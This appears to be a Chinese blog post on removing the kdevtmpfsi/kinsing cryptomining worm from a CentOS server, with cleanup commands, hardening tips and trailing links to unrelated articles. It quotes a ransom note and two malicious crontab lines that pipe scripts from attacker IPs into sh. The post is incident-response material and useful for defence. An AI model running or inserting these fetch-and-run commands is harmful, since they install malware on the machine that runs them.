(挖矿病毒清除)kdevtmpfsi 处理

Linux Centos 7 环境下的一台服务器CPU直接被打满,上服务器 top 命令看到了一个未知的 kdevtmpfsi 疯狂占用中,情况如下图:

同时阿里云检测平台,也同步提示对应容器出现的问题 

问题原因:

postgres RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆容器后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害极大。

造成影响:

本地数据库被删除并留下勒索信息

 All your data is backed up. You must pay 0.0058 BTC to 1tpwVPxbRNtQuzKonhzdEsJL8n562uwAr In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data03)

After paying send mail to us: rambler+3f9yx@onionmail.org and we will provide a link for you to download your data. Your DBCODE is: 3F9YX

您的所有数据都已备份。您必须在48小时内向1tpwvpxbrntquzkonhzdesjl8n 562 uwar支付0.0058 BTC,您的数据将被公开披露和删除。(更多信息:前往http://iplis.ru/data03)

付款后发送邮件给我们:rambler+3f9yx@onionmail.org,我们将提供一个链接供您下载您的数据。您的数据库代码是:3F9YX 

问题排查思路:

第一步: Top命令线程运行情况,找到kdevtmpfsi对应的进程ID

第二步:使用 kill -9 PID 杀死kdevtmpfsi 对应的进程,(暂时缓解CPU压力)

2分钟以后,再次被启动,怀疑有守护进行在检测

systemctl status 15727 查看其关联的守护进程,/tmp/kinsing   /tmp/kdevtmpfsi删除

[root@iZm5e8ejbcjlydiguo25t1Z cron]# rm -rf /tmp/kinsing
[root@iZm5e8ejbcjlydiguo25t1Z cron]# rm -rf /tmp/kdevtmpfsi

第二步crontab -l 命令先看看 crontab 的定时任务列表

[root@iZm5e8ejbcjlydiguo25t1Z /]# crontab -l
* * * * * wget -q -O - http://91.241.20.134/scg.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.191.32.198/scg.sh | sh > /dev/null 2>&1

第三步crontab -e 命令进行定时任务编辑(、,去除陌生的定时任务(要求在root用户下),在打开的文本中,按 i 进行编辑删除,编辑完后按Esc退出键退出编辑,再输入 :wq 强制性写入文件并退出

[root@iZm5e8ejbcjlydiguo25t1Z /]# crontab -e

第四步ps -ef|grep kdevtmpfsi  命令查看 kdevtmpfsi 的进程,并且使用 kill -9 PID 杀死kdevtmpfsi 对应的进程

[root@iZm5e8ejbcjlydiguo25t1Z /]# ps -ef|grep 15727
999      15727  2285 98 19:09 ?        00:12:10 /tmp/kdevtmpfsi
root     29256 19641  0 19:21 pts/0    00:00:00 grep --color=auto 15727
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# kill -9 15727
[root@iZm5e8ejbcjlydiguo25t1Z /]# 

第五步ps -ef|grep kinsing  命令查看kdevtmpfsi程序的守护进程kinsing  ,并且使用 kill -9 PID 杀死对应的进程

[root@iZm5e8ejbcjlydiguo25t1Z /]# ps -ef|grep kinsing
999       1499  2285  0 15:18 ?        00:00:02 /tmp/kinsing
root     30296 19641  0 19:22 pts/0    00:00:00 grep --color=auto kinsing
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# kill -9 1499
[root@iZm5e8ejbcjlydiguo25t1Z /]# 

第六步find / -iname kdevtmpfsi 命令再次确定kdevtmpfsi文件所在位置以便删除,使用 rm -rf 所在位置 删除 kdevtmpfsi 程序

[root@iZm5e8ejbcjlydiguo25t1Z /]#  find / -iname kdevtmpfsi
/var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/merged/tmp/kdevtmpfsi
/var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/diff/tmp/kdevtmpfsi
find: ‘/proc/31518’: 没有那个文件或目录
find: ‘/proc/31529’: 没有那个文件或目录
[root@iZm5e8ejbcjlydiguo25t1Z /]# rm -rf /var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/merged/tmp/kdevtmpfsi
[root@iZm5e8ejbcjlydiguo25t1Z /]# rm -rf /var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/diff/tmp/kdevtmpfsi
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# 

第七步find / -iname kinsing 命令再次确定 kinsing 文件所在位置以便删除,使用 rm -rf 所在位置 删除 kdevtmpfsi 程序

[root@iZm5e8ejbcjlydiguo25t1Z /]# find / -iname kinsing 
/var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/merged/tmp/kinsing
/var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/diff/tmp/kinsing
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# rm -rf /var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/merged/tmp/kinsing
[root@iZm5e8ejbcjlydiguo25t1Z /]# rm -rf /var/lib/docker/overlay2/043871417a5fb7387307cffa18df1e3abc234663e05b1948ce2aa31e907d6708/diff/tmp/kinsing
[root@iZm5e8ejbcjlydiguo25t1Z /]# 
[root@iZm5e8ejbcjlydiguo25t1Z /]# 

 第八步cat ~/.ssh/authorized_keys 查看是否有陌生的的公钥,有则删除掉

恢复正常,观察一天后,不会再次启动

问题防护:

  • 把异常的IP地址,入站及出站全部封禁
  • 禁止使用默认端口,非必要不暴露在公网或绑定指定IP
  • 启用ssh公钥登陆,禁用密码登陆。
  • 完善安全策略,入口流量,非必要一般只开放 80 443 端口就行,出口流量默认可以不限制,如果有需要根据需求来限制。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/279092.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ASP.NET Core 8.0 WebApi 从零开始学习JWT登录认证

文章目录 前言相关链接Nuget选择知识补充JWT不是加密算法可逆加密和不可逆加密 普通Jwt(不推荐)项目环境Nuget 最小JWT测试在WebApi中简单使用简单使用运行结果 WebApi 授权,博客太老了,尝试失败 WebApi .net core 8.0 最新版Jwt …

鸿蒙Harmony应用开发—ArkTS声明式开发(容器组件:ListItemGroup)

该组件用来展示列表item分组,宽度默认充满List组件,必须配合List组件来使用。 说明: 该组件从API Version 9开始支持。后续版本如有新增内容,则采用上角标单独标记该内容的起始版本。该组件的父组件只能是List。 使用说明 当List…

51单片机LED8*8点阵显示坤坤跳舞打篮球画面

我们作为一名合格的 ikun,专业的小黑子,这个重要的知识必须学会。 先看效果: 51LED点阵_鸡你太美 这里我们首先要用到延时函数Delay: void Delay(unsigned int xms) {unsigned char i, j;while(xms--){ i 2;j 239;do{while (-…

【PyQt】17-日历控件

文章目录 前言一、代码二、运行结果总结 前言 固定格式的表述 日期的获取 一、代码 #Author :susocool #Creattime:2024/3/19 #FileName:40-日历控件 #Description: 日历控件的展示 import sys from PyQt5.QtCore import * from PyQt5.QtWidgets import * from PyQ…

V-JEPA模型,非LLM另外的选择,AGI的未来:迈向Yann LeCun先进机器智能(AMI)愿景的下一步

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

Redisson 分布式锁原理分析

Redisson 分布式锁原理分析 示例程序 示例程序: public class RedissonTest {public static void main(String[] args) {Config config new Config();config.useSingleServer().setPassword("123456").setAddress("redis://127.0.0.1:6379"…

最新Java面试题2【2024初级】

下载链接:博主已将以上这些面试题整理成了一个面试手册,是PDF版的 互联网大厂面试题 1:阿里巴巴Java面试题 2:阿里云Java面试题-实习生岗 3:腾讯Java面试题-高级 4:字节跳动Java面试题 5:字…

Apache Dolphinscheduler - 无需重启 Master-Server 停止疯狂刷日志解决方案

记录的是一个 3.0 比较难搞的问题,相信不少使用过 3.0 的用户都遇到过 Master 服务中存在一些工作流或者任务流一直不停的死循环的问题,导致疯狂刷日志。不过本人到现在也没找到最关键的触发原因,只是看到一些连锁反应带来的结果…… 影响因素…

第十届教育技术前沿国际会议(ICFET 2024)即将召开!

ICFET 2024 | Malacca, MalaysiaInstallation Documentation for your Bootstrap Templatehttp://www.ICFET.org/ 组织单位: 会议主题: 整合教育技术 社交媒体和社交网络 语义网 3.0 播客播放视频讲座 播客向学生提供反馈 Wiki 和博客在高等教育中的…

MySQL最实用面试题(2024-3-14持续更新中)

MySQL篇面试题 一、介绍 ​ 这是由小龙同学自己总结领悟的mysql面试题的解析,也是面试宝典 二、题目 1.数据库三大范式: –作用: ​ 使表结构清晰,减少数据冗余(简单讲就是重复),提高查询…

《探索AI辅助研发的未来之路》

在当今科技飞速发展的时代,人工智能(AI)已经逐渐渗透到各个领域,其中之一便是研发领域。AI辅助研发正以惊人的速度改变着我们对于创新和发现的理解。本文将从技术进展、行业应用、挑战与机遇、未来趋势、法规影响以及人才培养等方…

STP环路避免实验(华为)

思科设备参考:STP环路避免实验(思科) 一,技术简介 Spanning Tree Protocol(STP),即生成树协议,是一种数据链路层协议。主要作用是防止二层环路,并自适应网络变化和故障…

Vue+SpringBoot打造民宿预定管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 用例设计2.2 功能设计2.2.1 租客角色2.2.2 房主角色2.2.3 系统管理员角色 三、系统展示四、核心代码4.1 查询民宿4.2 新增民宿4.3 新增民宿评价4.4 查询留言4.5 新增民宿订单 五、免责说明 一、摘要 1.1 项目介绍 基于…

GPT-5:人工智能的下一个前沿即将到来

当我们站在人工智能新时代的门槛上时,GPT-5即将到来的呼声愈发高涨且迫切。作为革命性的GPT-3的继任者,GPT-5承诺将在人工智能领域迈出量子跃迁式的进步,其能力可能重新定义我们与技术的互动方式。 通往GPT-5之路 通往GPT-5的旅程已经标记着…

鸿蒙-自定义组件的生命周期

目录 自定义组件的生命周期 1.aboutToAppear 2.aboutToDisappear 3.onPageShow 4.onPageHide 5.onBackPress 日志输出 1.显示页面 2.页面点击返回按钮 3.页面跳转 4.页面返回 自定义组件的生命周期 先来一段列子 import router from ohos.router Entry Component…

如何对医院运营管理进行3D可视化监控?推荐帆软智慧医院建设

智慧医院是运用云计算、大数据、物联网、移动互联网和人工智能等技术,通过建立互联、物联、感知、智能的医疗服务环境,整合医疗资源,优化医疗服务流程,规范诊疗行为,提高诊疗效率,辅助临床决策和医院管理决…

鸿蒙Harmony应用开发—ArkTS声明式开发(基础手势:Text)

显示一段文本的组件。 说明: 该组件从API Version 7开始支持。后续版本如有新增内容,则采用上角标单独标记该内容的起始版本。 子组件 可以包含Span和ImageSpan子组件。 接口 Text(content?: string | Resource, value?: TextOptions) 从API versi…

四.排序(冒泡/选择)

目录 11-排序介绍 常见排序算法: 12-冒泡排序介绍 代码要求: 思路: 13-冒泡排序 代码: 14-选择排序 简单写法: 好的写法: 11-排序介绍 排序:将一组“无序”的记录序列调整为“有序”的记录序列。 列表排序:将无序列表变为有序列表 输入&#…

Samtec科普 | 一文了解患者护理应用连接器

【摘要/前言】 通过医疗专业人士为患者提供护理的种种需求,已经不限于手术室与医院的各种安全状况。当今许多患者的护理都是在其他环境进行,例如医生办公室、健康中心,还有越来越普遍的住家。尤其是需要长期看护的患者,所需的科技…

达梦数据库SQL

达梦JSON函数技术文档 SQL中关键词处理 -- 必须要使用双引号包裹 select id,"comment" from t_cmp_rd_process;select id,"commit" from t_cmp_rd_gjj_eva;JSON_EXTRACT函数 -- party_sup_other_json 是包含JSON数据的列名。 -- $.content_abstract 是J…